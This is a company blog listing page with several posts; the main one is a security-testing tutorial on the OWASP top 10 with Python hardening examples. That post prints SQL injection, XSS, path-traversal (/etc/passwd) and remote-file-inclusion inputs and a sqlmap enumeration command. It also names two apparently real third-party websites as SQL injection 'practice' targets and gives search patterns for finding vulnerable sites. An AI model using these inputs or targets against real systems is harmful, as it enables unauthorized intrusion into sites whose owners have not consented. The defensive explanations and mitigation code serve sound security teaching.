
Power of live chat: Boost your conversion by 3.5X

Many online consumers want help from a live person while they are shopping online; in fact, 44% of online consumers say that having questions answered by a live person while in the middle of an online purchase is one of the most important features a Website can offer.

Increase online sales by 3.5 times with a chat solution:

At Mantra we have seen online chat interfaces increase a platform's online sales by more than 3.5 times after the chat service was introduced. We believe that live chat can add real value to your business with its wide range of benefits and functionalities.

One of India’s health insurance companies approached us to improve their customer experience. Based on what we learned from developing AI chatbot solutions for enterprise customers, we have developed a Hybrid AI-Enabled Chat Solution which combines the best of traditional and AI chat solution options.

 Our Hybrid AI-Enabled Chat Solution

The core idea is to quickly deploy an enterprise-grade chat solution for the client (over Mobile, Web or Facebook) with the ability for human agents to carry out meaningful conversations with customers. This conversational data will be the input for training a bot, which will learn over time and then start assisting human agents in drafting meaningful responses. Eventually, when the bot is trained enough, it will be able to take over from agents, with a manual override function always available.

The core USPs of the solution are

a. Quicker Deployment.

b. More meaningful Data for bots to train on.

c. Significant savings in the long-term with agents being replaced.

A chat interface should be one of your high-priority items for website improvement. We can surely help you with that, and you don’t need to take our word for it: we already have proven results to back it up.

 

Latest PHP Trends in 2018

 

PHP is one of the simplest server-side scripting languages to use. PHP frameworks are developed to complement PHP in many ways: they provide a basic structure and require developers to follow coding standards and development guidelines, which stabilizes the product and standardizes the process. This helps to reduce complexity and lets developers focus on their specific areas without affecting the development of other modules.

I have listed some of the main PHP frameworks which will remain the popular choice for developers in 2018 as well.

Laravel

According to our recent analysis of Google Trends, the Laravel framework clearly stands above all the frameworks listed and shall stay at the top in 2018. Sitepoint's 2015 survey showed that the Laravel framework has excellent documentation, robust features and a growing support community, which made Laravel a clear winner in the list of PHP frameworks. Since then, up to the launch of Laravel 5.5, Google Trends has shown an increase in Laravel searches across the globe.

The Laravel framework provides many specific packages such as the Blade templating engine, Artisan, Eloquent ORM, middleware, PHPUnit for unit testing and RESTful controllers, and was the first to introduce routing in an abstract way. Because of these extensive features, many companies started providing Laravel Development Services to grow their business.

One of the most important functionalities of Laravel is the way it handles NoSQL structures like MongoDB & more. It is easy & comfortable for any developer to get started with Laravel because of its excellent documentation. If you are a developer who wishes to work with PHP then it is very useful to become a PHP Laravel developer.

CodeIgniter

This framework, which is more than 11 years old, shot to fame thanks to its relatively modest use of resources, its simplicity and convenience, its large amount of documentation aimed at developers of any level, and its absence of restrictions. Laravel originally began development as a competitor to CodeIgniter, which until recently was a universal benchmark.

  • Great community support for CodeIgniter Reactor, including libraries, modules, templates, and documentation;
  • Templates to work with databases, which are very similar to SQL syntax
  • The possibility of caching on the server side;
  • Using the package manager for quick connection of the libraries from the command line.

Symfony

Symfony has been touted for a while now as a very stable, high performance, well documented, and modular project. Symfony is backed by the French SensioLabs and has been developed by them and its community to be a fantastic framework.

  • Symfony defines MVC while many other frameworks try to simply follow MVC rules.
  • The standards of Symfony also make it easier to catch errors and to write high-quality code; its community is growing every year.
  • Symfony is the leading PHP framework to create websites and web applications
  • Laravel uses Symfony

Symfony is used by many big-name companies like the BBC and open source projects such as Drupal and eZpublish. Symfony was written with stability in mind in a very professional way. Its documentation is extensive, and its community is just as vast. Hence it is used for building both performant REST APIs and fully fledged web applications.

Yii 

Yii is considered the best among many PHP frameworks. This framework facilitates the development of any kind of web app. It is known for being fast and flexible. Yii 2 is easy to install as it utilizes modern technologies and is backed by an extensive set of features. Moreover, it supports high extensibility with great security and encourages testing. The launch of the Yii 2.0 beta has started attracting developers with its new functionalities, features, changes, bug fixes and more. Yii 2 supports PHP 5.3, and some of the functionalities have been inherited from Yii 1.1.

CakePHP

Being one of the oldest frameworks, CakePHP retains its user base and is gradually but continuously growing. It also has an impressive portfolio comprising big brands such as Express and BMW. Like CodeIgniter, CakePHP is an ideal framework for beginners. It also supports the rapid development of commercial web apps. It has built-in code generation with scaffolding functionality to increase the speed of development, and numerous packages to carry out general functionalities. Configuring CakePHP is a breeze as it reduces the need for complicated files such as XML or YAML config files. Faster builds are one of the main features, along with security features which include measures to prevent cyber-attacks.

ZEND

Zend Framework is prominently known as a go-to professional framework. It is commonly used for powerful enterprise-level applications. It is built with security, extensibility and performance in mind. Zend isn’t ideal for rapid application development, as it was developed with a focus on enterprise applications; hence it has an enterprise-driven nature with the support of numerous components such as feeds, forms, services and more.

Here is the link to see what the trends were in 2017: Latest PHP trends in 2017

 

Web Application Security Testing – Part 1


The Open Web Application Security Project (OWASP) is an international organization dedicated to enhancing the security of web applications.

The conference was held at Mantra Labs by one of our experienced test engineers, Rijin. He discussed the current top 10 web application security risks worldwide. The list describes each vulnerability, provides examples, and offers suggestions on how to avoid it.

The top 10 web application security risks worldwide are:

  1. Injection
  2. Broken authentication and session management
  3. Cross-site scripting
  4. Indirect object security reference
  5. Security misconfiguration
  6. Sensitive data exposure
  7. Missing function level access control
  8. Cross site forgery
  9. Using components with known vulnerabilities: Heartbleed and Shellshock
  10. Unvalidated redirects and forwards

Link to Hackerone Bug reports:

https://h1.sintheticlabs.com/

From here you can get an understanding of ongoing security issues and bugs, and of how hackers are exploiting web applications. Various security/penetration bugs are listed here.

https://www.exploit-db.com/exploits/42309/

 

  1. INJECTION

This is when an attacker sends rogue content to a web application interpreter, causing the interpreter to execute unauthorized commands. The most common code injection attacks are SQL injections, also known as SQLi. An SQLi attack happens when malformed code is sent to the database server, leading to the exposure of your data. This attack style is so simple that anyone with access to the internet can do it: SQLi scripts are available for download and can be acquired easily.

How is it done?

The character “‘” is entered into the search field and pressing the button leads to an error page which displays more information than needed.

This example showcases a badly and insecurely programmed application that is incapable of handling SQL Injections. Just a few illegal characters with a little sniffing around leads the hacker to this string: “‘ union select password from users;”. He can then implement this finding to harvest usernames and passwords from the database. This is just one basic way to exploit application databases.
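The behaviour described above, reproduced against a constructed in-memory SQLite database, with the string-concatenated query beside a parameterized one. This is an added example, not code from the talk; the table names, sample rows and function names are assumptions made for illustration.

```python
import sqlite3


def make_db():
    """Build a constructed in-memory catalogue with a users table beside it."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE products (name TEXT);
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO products VALUES ('pen'), ('pencil'), ('notebook');
        INSERT INTO users VALUES ('alice', 'constructed-secret');
        """
    )
    return conn


def search_vulnerable(conn, term):
    # Insecure "before" form: the search term is pasted into the SQL text,
    # so a quote in the input changes the structure of the statement.
    sql = "SELECT name FROM products WHERE name LIKE '%" + term + "%'"
    return sorted(row[0] for row in conn.execute(sql))


def search_safe(conn, term):
    # Hardened form: the statement text is fixed and the term is bound as
    # data, so quotes and SQL keywords in it are only ever matched as text.
    sql = "SELECT name FROM products WHERE name LIKE '%' || ? || '%'"
    return sorted(row[0] for row in conn.execute(sql, (term,)))


def handle_search(conn, term):
    """Return (status, body) without echoing database errors to the client."""
    try:
        return 200, search_safe(conn, term)
    except sqlite3.Error:
        # Log the detail server-side; the client only sees a generic message,
        # unlike the error page "which displays more information than needed".
        return 500, "Search is temporarily unavailable."


def probe(conn, search, term):
    """Report how one search function reacts to one input."""
    try:
        return ("ok", search(conn, term))
    except (sqlite3.Error, sqlite3.Warning) as exc:
        return ("sql-error", type(exc).__name__)


if __name__ == "__main__":
    db = make_db()
    for term in ["pen", "'", "' union select password from users;"]:
        print(repr(term))
        print("  concatenated :", probe(db, search_vulnerable, term))
        print("  parameterized:", probe(db, search_safe, term))
```

A SQL error triggered by a lone quote is the signal a tester looks for; with the parameterized query the same inputs simply match no product.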

Tool commonly used for SQL Injection

SQLmap

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.

It is commonly used in Kali-linux.

After finding a vulnerable page you can find database by typing :

sqlmap -u (url) --dbs

Guide to exploit via sqlmap

https://www.darkmoreops.com/2014/08/28/use-sqlmap-sql-injection-hack-website-database/

https://www.hackers-arise.com/single-post/2017/01/20/Database-Hacking-Part-3-Using-sqlmap-for-SQL-Injection-Against-MySQL-and-WordPress

For practice you can use the following websites:

http://www.shumka.com/shumka-at-50/news/index.php?id=847

http://waytogonatural.com/product_detail.php?ID=4526

You can also find SQL vulnerable website on your own. You just have to look for

  • php?id=(any Number)
  • login.php?id=(any number)
  • index.php?id=(any number)

Examples of SQL injection:

https://hackerone.com/reports/200818

https://hackerone.com/reports/179751

2. BROKEN AUTHENTICATION AND SESSION MANAGEMENT

Incorrect implementation of authentication schemes and session management can allow unauthorized users to assume the identities of valid users.

Broken Authentication and Session Management attacks are anonymous attacks with the intention to try and retrieve passwords, user account information, IDs and other details.

Key Points to check if you are vulnerable:

  1. User authentication credentials aren’t protected when stored using hashing or encryption.
  2. Credentials can be guessed or overwritten through weak account management functions (e.g., account creation, change password, recover password, weak session IDs).
  3. Session IDs are exposed in the URL (e.g., URL rewriting).
  4. Session IDs are vulnerable to session fixation attacks.
  5. Session IDs don’t timeout, or user sessions or authentication tokens, particularly single sign-on (SSO) tokens, aren’t properly invalidated during logout.
  6. Session IDs aren’t rotated after successful login.
  7. Passwords, session IDs, and other credentials are sent over unencrypted connections.

Examples of attack scenarios:

Scenario #1:

Airline reservations application supports URL rewriting, putting session IDs in the URL:

http://example.com/sale/saleitems?sessionid=268544541&dest=Hawaii

An authenticated user of the site wants to let his friends know about the sale. He e-mails the above link without knowing he is also giving away his session ID. When his friends use the link they will use his session and credit card.

Scenario #2:

Application’s timeouts aren’t set properly. User uses a public computer to access site. Instead of selecting “logout” the user simply closes the browser tab and walks away. Attacker uses the same browser an hour later, and that browser is still authenticated.

Scenario #3:

Insider or external attacker gains access to the system’s password database. User passwords are not properly hashed, exposing every user’s password to the attacker.

Vulnerability to ‘Sensitive Data exposure’:

 

  1. Is any of this data stored in clear text long term, including backups of this data?
  2. Is any of this data transmitted in clear text, internally or externally? Internet traffic is especially dangerous.
  3. Are any old / weak cryptographic algorithms used?
  4. Are weak crypto keys generated, or is proper key management or rotation missing?
  5. Are any browser security directives or headers missing when sensitive data is provided by / sent to the browser? (Nikto)

Prevention from Sensitive data exposure:

  1. Make sure you encrypt all sensitive data.
  2. Don’t store sensitive data unnecessarily. Discard it as soon as possible. Data you don’t have can’t be stolen.
  3. Ensure strong standard algorithms and strong keys are used, and proper key management is in place.
  4. Ensure passwords are stored with an algorithm specifically designed for password protection, such as bcrypt, PBKDF2, or scrypt.
  5. Disable autocomplete on forms collecting sensitive data and disable caching for pages that contain sensitive data.

Protection against broken authentication and session management:

Password Strength

-Minimum size and complexity.

-Complexity depends on the usage of combinations of alphabetic, numeric, and/or non-alphanumeric characters

-Change password periodically

-Prevent from reusing previous passwords.

Password Use 

-Restrict to a defined number of login attempts per unit of time and repeated failed login attempts should be logged.

-System should not indicate whether it was the username or password that was wrong if a login attempt fails.

Password Change Controls 

-Users should always be required to provide both their old and new password when changing their password.

-If forgotten passwords are emailed to users, the system should require the user to reauthenticate whenever the user is changing their e-mail address, otherwise an attacker who temporarily has access to their session (e.g., by walking up to their computer while they are logged in) can simply change their e-mail address and request a ‘forgotten’ password be mailed to them.

Password Storage 

-Passwords must be stored in either hashed or encrypted form

-Encryption should be used when the plain text password is needed

Session ID Protection

-A user’s entire session should be protected via SSL.

-Session ID should never be included in the URL as they can be cached by the browser.

-Session IDs should be long, complicated, random numbers that cannot be easily guessed.

-Session IDs can also be changed frequently during a session to reduce how long a session ID is valid. Session IDs must be changed when switching to SSL, authenticating, or other major transitions.

Browser Caching 

-Authentication and session data should never be submitted as part of a GET; POST should always be used instead.

-Authentication pages should be marked with all varieties of the no cache tag to prevent someone from using the back button in a user’s browser to back up to the login page and resubmit the previously typed in credentials.
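Several of the protections listed above (password storage with PBKDF2, a login attempt limit, one failure message for both wrong username and wrong password, random session IDs, rotation at login, idle timeout and invalidation at logout) put together in one small service. This is an added example, not code from the talk; the class name, constants and in-memory stores are assumptions made for illustration.

```python
import hashlib
import hmac
import secrets
import time

PBKDF2_ITERATIONS = 600_000      # assumption: tune to your hardware budget
SESSION_IDLE_SECONDS = 15 * 60   # assumption: 15-minute idle timeout
MAX_FAILURES = 3                 # assumption: lock after 3 consecutive failures
GENERIC_FAILURE = "Invalid username or password."


def hash_password(password, salt=None):
    """Return (salt, digest) using PBKDF2-HMAC-SHA256 with a per-user salt."""
    salt = salt or secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return salt, digest


class AuthService:
    def __init__(self, clock=time.monotonic):
        self.clock = clock
        self.users = {}      # username -> (salt, digest); no plaintext stored
        self.failures = {}   # username -> consecutive failed logins
        self.sessions = {}   # session id -> [username or None, last seen]
        # Hash checked for unknown usernames so both failure paths do the
        # same amount of work and return the same message.
        self._dummy = hash_password(secrets.token_hex(16))

    def register(self, username, password):
        self.users[username] = hash_password(password)

    def new_session(self, username=None):
        sid = secrets.token_urlsafe(32)  # 256 random bits from the OS CSPRNG
        self.sessions[sid] = [username, self.clock()]
        return sid

    def login(self, old_sid, username, password):
        """Return (new_session_id, message); the id is None on failure."""
        if self.failures.get(username, 0) >= MAX_FAILURES:
            return None, GENERIC_FAILURE  # locked; log this server-side
        salt, expected = self.users.get(username, self._dummy)
        _, candidate = hash_password(password, salt)
        ok = hmac.compare_digest(candidate, expected) and username in self.users
        if not ok:
            self.failures[username] = self.failures.get(username, 0) + 1
            return None, GENERIC_FAILURE
        self.failures.pop(username, None)
        # Rotate: the pre-login session id is discarded, which defeats
        # session fixation with an id planted before authentication.
        self.sessions.pop(old_sid, None)
        return self.new_session(username), "ok"

    def current_user(self, sid):
        entry = self.sessions.get(sid)
        if entry is None:
            return None
        if self.clock() - entry[1] > SESSION_IDLE_SECONDS:
            del self.sessions[sid]  # idle timeout: closing the tab is enough
            return None
        entry[1] = self.clock()
        return entry[0]

    def logout(self, sid):
        self.sessions.pop(sid, None)  # invalidate server-side, not only the cookie


if __name__ == "__main__":
    svc = AuthService()
    svc.register("alice", "correct horse battery staple")
    anon = svc.new_session()
    sid, msg = svc.login(anon, "alice", "correct horse battery staple")
    print(msg, svc.current_user(sid), svc.current_user(anon))
```

A production service would also reset the failure counter after a time window and keep these stores in a database rather than in process memory.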

Examples of broken authentication and session management:

3. CROSS SITE SCRIPTING

This is when a browser unknowingly executes scripts to hijack sessions or redirect to a rogue site.

Cross-site Scripting (XSS) refers to client-side code injection attack wherein an attacker can execute malicious scripts (also commonly referred to as a malicious payload) into a legitimate website or web application. XSS is amongst the most rampant of web application vulnerabilities and occurs when a web application makes use of unvalidated or unencoded user input within the output it generates.

By leveraging XSS, an attacker does not target a victim directly. Instead, an attacker would exploit a vulnerability within a website or web application that the victim would visit, essentially using the vulnerable website as a vehicle to deliver a malicious script to the victim’s browser.

There are basically two types of XSS:

a)Stored XSS

b)Reflected XSS

Stored XSS

  • A Stored Cross Site Scripting vulnerability occurs when the malicious user can store some attack which will be called at a later time upon some other unknowing user. The attack is actually stored in some method to be later executed.
  • The storage method could involve a database, a wiki, or a blog. Basically the malicious user has stored some type of attack so that, when an unknowing user encounters it, the attack is executed. The stored method has not only the problem of incorrect input validation, but also of output validation. Even if data has been sanitized upon input, it should also be checked in the output process. By checking and validating the output, you could also uncover unknown issues in the input validation process.

Reflected XSS

  • The malicious user has discovered that a field within a website or web application holds an XSS vulnerability. This malicious user then crafts a way to use the vulnerability to execute something malicious against some unknowing user. Reflected XSS vulnerabilities occur when an unknowing user is directed by the malicious user to a web application that has an XSS vulnerability. Once the unknowing user gets to the web site or application, the malicious user’s attack is executed.
  • The attack is crafted as a series of URL parameters that are sent via a URL. The malicious user then sends his/her malicious URL with the URL parameters to unknowing users. This is typically sent by email, instant messages, blogs or forums, or any other possible methods.

How to test for XSS injection vulnerabilities, example:

You can determine whether a web-based application is vulnerable to XSS attacks very easily. A simple test is to take a parameter that is sent in the HTTP GET request and modify it. Take for example the following request in the browser address bar. This URL takes a name parameter that you enter in a textbox and prints something on the page, like “Hello George, thank you for coming to my site”:

http://www.yoursite.com/index.html?name=george

Now modify it to add some additional information to the parameter. For example, try entering something similar to the following request in the browser address bar.

http://www.yoursite.com/index.html?name=<script>alert('You just found a XSS vulnerability')</script>

If this pops up an alert message box stating “You just found a XSS vulnerability”, then you know this parameter is vulnerable to XSS attacks. The name parameter is not being validated; it allows anything to be processed as a name, including a malicious script injected into the parameter. What is occurring is that where the name George would normally be written on the page, the <script></script> message is instead being written to the dynamic page.

The alert message is just an example of how to test for the XSS vulnerability.
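The greeting page from the test above, rendered without and with output encoding, plus a parser-based check that can run in a test suite to confirm a reflected parameter adds no new elements to the page. This is an added example, not code from the talk; the function names are assumptions and the page template is constructed from the “Hello George” text.

```python
import html
from html.parser import HTMLParser

# The probe string is the one used in the text above.
PROBE = "<script>alert('You just found a XSS vulnerability')</script>"


def render_greeting_vulnerable(name):
    # "Before" form: the parameter is written into the page as markup.
    return "<p>Hello " + name + ", thank you for coming to my site</p>"


def render_greeting_safe(name):
    # Output encoding for the HTML body context: <, >, & and quotes become
    # character references, so the browser shows the text instead of
    # parsing it as elements.
    return "<p>Hello " + html.escape(name, quote=True) + ", thank you for coming to my site</p>"


class _TagCollector(HTMLParser):
    """Record every element the HTML parser sees as a start tag."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def _tags(markup):
    collector = _TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags


def markup_introduced(render, probe_value, baseline_value="george"):
    """Return the elements present for the probe value but not for a benign
    value; an empty list means the parameter stayed plain text."""
    found = _tags(render(probe_value))
    for tag in _tags(render(baseline_value)):
        if tag in found:
            found.remove(tag)
    return found


if __name__ == "__main__":
    print("unencoded:", markup_introduced(render_greeting_vulnerable, PROBE))
    print("encoded  :", markup_introduced(render_greeting_safe, PROBE))
    print(render_greeting_safe(PROBE))
```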

Some examples of cross-site scripting attack vectors:

http://hackersonlineclub.com/cross-site-scripting-xss/

Tools that can be used:

Zaproxy: It’s a freeware.

https://github.com/zaproxy/zaproxy/wiki/Downloads

Burp Suite and BeEF can also be used to find XSS vulnerabilities.

4. INDIRECT OBJECT SECURITY REFERENCE

An attacker can access a reference to a file or directory and manipulate that reference to gain unauthorized access to other objects.

A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, database record, or key, as a URL or form parameter. An attacker can manipulate direct object references to access other objects without authorization, unless an access control check is in place.

  • Vulnerability to Insecure Direct Object References
  1. For direct references to restricted resources, does the application fail to verify the user is authorized to access the exact resource they have requested?
  2. If the reference is an indirect reference, does the mapping to the direct reference fail to limit the values to those authorized for the current user?
  • To test Insecure Direct Object References

To test for this vulnerability the tester first needs to map out all locations in the application where user input is used to reference objects directly. For example, locations where user input is used to access a database row, a file, application pages and more. Next the tester should modify the value of the parameter used to reference objects and assess whether it is possible to retrieve objects belonging to other users or otherwise bypass authorization.

The best way to test for direct object references would be by having at least two (often more) users to cover different owned objects and functions. For example two users each having access to different objects (such as purchase information, private messages, etc.), and (if relevant) users with different privileges (for example administrator users) to see whether there are direct references to application functionality. By having multiple users the tester saves valuable testing time in guessing different object names as he can attempt to access objects that belong to the other user.

Some basic examples:

The value of a parameter is used directly to retrieve a database record

Sample request:

http://foo.bar/somepage?invoice=12345

  • In this case, the value of the invoice parameter is used as an index in an invoices table in the database. The application takes the value of this parameter and uses it in a query to the database. The application then returns the invoice information to the user.
  • Since the value of invoice goes directly into the query, by modifying the value of the parameter it is possible to retrieve any invoice object, regardless of the user to whom the invoice belongs. To test for this case the tester should obtain the identifier of an invoice belonging to a different test user (ensuring he is not supposed to view this information per application business logic), and then check whether it is possible to access objects without authorization.
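The invoice lookup above with and without an ownership check, a per-user indirect reference map, and the two-user test automated as a function. This is an added example, not code from the talk; the invoice records, user names and function names are constructed for illustration.

```python
import secrets

# Constructed sample data: invoice id -> record.
INVOICES = {
    12345: {"owner": "alice", "total": "120.00"},
    12346: {"owner": "bob", "total": "75.50"},
    12347: {"owner": "bob", "total": "19.99"},
}


def get_invoice_vulnerable(user, invoice_id):
    # "Before" form: the parameter is used as the index and nothing checks
    # who is asking.
    return INVOICES.get(invoice_id)


def get_invoice_checked(user, invoice_id):
    # Access control check on the exact resource requested. "Missing" and
    # "not yours" give the same answer so ids cannot be enumerated.
    record = INVOICES.get(invoice_id)
    if record is None or record["owner"] != user:
        return None
    return record


class InvoiceRefs:
    """Indirect references: the client only ever sees random tokens, and the
    map holds only the invoices the current user is authorized for."""

    def __init__(self, user):
        self.user = user
        self._by_token = {
            secrets.token_urlsafe(8): invoice_id
            for invoice_id, record in INVOICES.items()
            if record["owner"] == user
        }

    def tokens(self):
        return list(self._by_token)

    def resolve(self, token):
        invoice_id = self._by_token.get(token)
        if invoice_id is None:
            return None
        return get_invoice_checked(self.user, invoice_id)


def cross_user_leaks(get_invoice, users=("alice", "bob")):
    """The two-user test: each user requests every invoice id, and any
    (user, id) pair that returns someone else's record is reported."""
    leaks = []
    for user in users:
        for invoice_id, record in INVOICES.items():
            if record["owner"] != user and get_invoice(user, invoice_id) is not None:
                leaks.append((user, invoice_id))
    return leaks


if __name__ == "__main__":
    print("no check  :", cross_user_leaks(get_invoice_vulnerable))
    print("with check:", cross_user_leaks(get_invoice_checked))
```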

Examples of the attack:

https://hackerone.com/reports/12011

https://hackerone.com/reports/42587

Testing traversal/file include

Many web applications use and manage files as part of their daily operation. Using input validation methods that have not been well designed or deployed, an aggressor could exploit the system in order to read or write files that are not intended to be accessible.

Testing techniques to test this flaw

In order to determine which part of the application is vulnerable to input validation bypassing, the tester needs to enumerate all parts of the application that accept content from the user. Here are some examples of the checks to be performed at this stage:

Are there request parameters which could be used for file-related operations?

Are there unusual file extensions?

Are there interesting variable names?

http://example.com/getUserProfile.jsp?item=ikki.html

http://example.com/index.php?file=content

http://example.com/main.cgi?home=index.htm

An attacker could insert the malicious string “../../../../etc/passwd” to include the password hash file of a Linux/UNIX system. This kind of attack is possible only if the validation checkpoint fails; according to the file system privileges, the web application itself must be able to read the file.

http://example.com/getUserProfile.jsp?item=../../../../etc/passwd

It is also possible to include files and scripts located on an external website.

http://example.com/index.php?file=http://www.owasp.org/malicioustxt

If protocols are accepted as arguments, as in the above example, it’s also possible to probe the local filesystem this way.

http://example.com/index.php?file=file:///etc/passwd

If protocols are accepted as arguments, as in the above examples, it’s also possible to probe the local services and nearby services.

http://example.com/index.php?file=http://localhost:8080 or http://example.com/index.php?file=http://192.168.0.2:9080

Example of path traversal: https://hackerone.com/reports/150018
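A validation checkpoint for the file parameter in the requests above: it refuses anything carrying a protocol and only serves paths that still resolve inside one base directory. This is an added example, not code from the talk; the function names and the temporary directory layout are assumptions constructed for illustration.

```python
import os
import tempfile
from urllib.parse import urlsplit


def resolve_under(base_dir, requested):
    """Return the real path of `requested` inside `base_dir`, or None."""
    # Protocols as arguments (http://, file://) are never a local file name.
    if urlsplit(requested).scheme or requested.startswith("//"):
        return None
    if "\x00" in requested:
        return None
    base = os.path.realpath(base_dir)
    # realpath collapses ../ sequences and follows symlinks, so the check
    # below sees where the request really ends up on disk.
    candidate = os.path.realpath(os.path.join(base, requested))
    try:
        inside = os.path.commonpath([base, candidate]) == base
    except ValueError:  # e.g. different drives on Windows
        inside = False
    if not inside or not os.path.isfile(candidate):
        return None
    return candidate


def check_samples():
    """Run the request values from the text against a constructed tree and
    return {requested value: True if it would be served}."""
    samples = [
        "ikki.html",
        "../../../../etc/passwd",
        "../secret.txt",
        "/etc/passwd",
        "file:///etc/passwd",
        "http://localhost:8080",
        "http://192.168.0.2:9080",
    ]
    with tempfile.TemporaryDirectory() as root:
        base = os.path.join(root, "public")
        os.mkdir(base)
        with open(os.path.join(base, "ikki.html"), "w") as handle:
            handle.write("constructed profile page")
        with open(os.path.join(root, "secret.txt"), "w") as handle:
            handle.write("constructed file outside the web root")
        return {value: resolve_under(base, value) is not None for value in samples}


if __name__ == "__main__":
    for value, served in check_samples().items():
        print(("serve " if served else "reject"), value)
```

Where the set of pages is fixed, mapping a short key such as `content` to a file name on the server side avoids accepting paths from the client at all.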

5. SECURITY MISCONFIGURATION

Improper server or web application configuration leading to various flaws.

  • Debugging enabled
  • Incorrect folder permissions
  • Using default accounts or passwords

Vulnerability to Security Misconfiguration

Is your application missing the proper security hardening across any part of the application stack? Including:

  1. Is any of your software out of date? This software includes the OS, Web/App Server, DBMS, applications, APIs, and all components and libraries.
  2. Are any unnecessary features enabled or installed (e.g., ports, services, pages, accounts, privileges)?
  3. Are default accounts and their passwords still enabled and unchanged?
  4. Does your error handling reveal stack traces or other overly informative error messages to users?
  5. Are the security settings in your application servers, application frameworks (e.g., Struts, Spring, ASP.NET), libraries, databases, etc. not set to secure values?

Attack scenarios:

Scenario #1: The app server admin console is automatically installed and not removed. Default accounts aren’t changed. Attacker discovers the standard admin pages are on your server, logs in with default passwords, and takes over.

Scenario #2: Directory listing is not disabled on your web server. An attacker discovers they can simply list directories to find any file. The attacker finds and downloads all your compiled Java classes, which they decompile and reverse engineer to get all your custom code. Attacker then finds a serious access control flaw in your application.

Scenario #3: App server configuration allows stack traces to be returned to users, potentially exposing underlying flaws such as framework versions that are known to be vulnerable.

Scenario #4: App server comes with sample applications that are not removed from your production server. These sample applications have well known security flaws attackers can use to compromise your server.

Protection against Security misconfigurations:

  • Install latest updates and security patches. Have an easy to manage updating process with test environments to check updates before deploying to production environments.
  • Remove sample applications that ship with content delivery systems and web frameworks. Most tools that help build web applications include demo and sample code to help teach developers how to use the tools and get you started. These samples and demos should be removed. They provide a known target for anyone attempting to compromise web application security.
  • Remove unused features, plugins and web pages. Only include the parts of web applications that you need to provide your service to end users. Remove any plugins or functionality that you are not using.
  • Turn off access to setup and configuration pages. Don’t leave the setup and configuration pages available for users to use.
  • Change usernames, passwords and ports for default accounts. Web application frameworks and libraries often ship with default administration names, passwords and access ports enabled. Everyone knows these. Change all these to non standard usernames, passwords and ports.
  • Don’t share passwords between accounts on Dev, Test and Production systems. Related to the point above. Don’t use the same administration accounts and settings across your Dev, Test and Production systems.
  • Turn off debugging so that internal info isn’t sent back in response to test queries or errors. Excessive debugging information can be used to glean information about a web applications configuration.

Good read :

https://lockmedown.com/owasp-5-security-misconfiguration-hardening-your-asp-net-app/

Stay tuned for rest of the security risks, they are coming shortly.

“User Tracking Code” for Secure Lead Attribution

There are various insurance aggregators in the industry which frequently compare various insurance plans.

Often, a user might check out the details of a policy from the aggregator, but might not buy it from there.

There is a good chance that he goes to the actual insurance site and buys the policy from there. Read More….

Laravel vs Zend – Features You Need to Know Before You Start

Developing Web applications can be a time intensive and complicated process as it involves delivering unique user experiences over browsers and smartphones. However, it can be streamlined by using PHP framework to create simple and rapid agile applications. This is usually doable due to the reuse of generic modules or components, and the convenience that comes with a unified structural foundation. Read More….

7 Important Points To Consider Before Developing A Mobile App


Are you developing an application? Don’t you know what must be considered before starting?

Let’s start with an example – You have an idea to develop an application but you don’t know whether it will actually get a good response from users or not. The first step is that your idea should be unique, one that has never been implemented previously.

Even if you develop an app that has never been developed, what is the guarantee that users will download and use it? Even if they download it, what are the chances of them using your app in the right way? Read More….

Google’s Material Design for Android- Trends You Must Follow in 2016

Material Design is the latest design language developed by Google. Material Design makes more liberal use of grid-based layouts, responsive animations and transitions, padding, and depth effects such as lighting and shadow.

Material Design is Google’s conceptual design philosophy that outlines how apps should look and work on mobile devices. It breaks down everything, such as animation, style and layout, and gives guidance on patterns, components and usability. According to Google: “We challenged ourselves to create a visual language for our users that synthesizes the classic principles of good design with the innovation and possibility of technology and science. This is material design.” Read More….

10 Basic Principles of Interaction Design You Need to Know.

The definition for Interaction Design is, “it is the behaviour and structure of the interactive systems”. In other words, it is the relationship between the user and the product, and the service they use.

The interaction design should create great user experience. It requires experience and understanding of basic principles of the interaction design in most of the UI disciplines. It’s about designing for the entire interconnected system: the device, the interface, the context, the environment, and the people. Interaction designers strive to create meaningful relationships between people and the products and services that they use, from computers, to mobile devices, to appliances, and beyond.

Interaction Design principles are important to keep in mind as we develop complex applications. There are some key elements of an interaction design that cannot be neglected while creating an interface for the user.

Ten basic principles of interaction design that are needed to be considered are given below: Read More….

Java Vs Node.JS for Backend APIs – Developer’s Comparison

Java is considered as the best application development language. It is an object-oriented programming language which is used to create efficient quality applications for both computers and mobile phones. Java dominates Android phones, enterprise computing, and some embedded worlds like Blu-ray disks. While on the other hand Node.JS is a programming platform that allows you to write JavaScript on both the client side and the server side, mostly server-side code that is identical in syntax to browser JavaScript. It opens up new perspectives, still having its “browser” nature. The developers use both the languages to develop applications depending on the preference and the need of application. Read More….

10 Reasons To Get Started With Swift Programming Language

Swift is a powerful and intuitive programming language built on the best of C and Objective-C for iOS, OS X, tvOS, and watchOS. It proves to be effective as it is able to eliminate the constraints of C compatibility. Writing Swift code is interactive and fun, the syntax is concise yet expressive, and apps run lightning-fast. Swift possesses safer patterns for programming and it adds modern features to make programming easier, more flexible, and more fun.

Swift has the potential to become the de-facto programming language for creating immersive, responsive, consumer-facing applications for years to come. With optimized compiler for performance and the language for development, it generates faster code across the board, both for release and debug builds. The Swift compiler is also faster, even while adding new Fix-it suggestions such as where you can use let instead of var. Comments can include Markdown syntax to add rich text and embedded images that display in Xcode’s Quick Help. A new assistant shows your Swift API in a “header-like” view. And new syntax features combined with improvements to the Cocoa frameworks and Objective-C will make your code more expressive, and even safer.

Swift programming language has not only received widespread acceptance but has also become one of software developers’ favorite tools. Here are 10 reasons to get started to work with Swift now: Read More….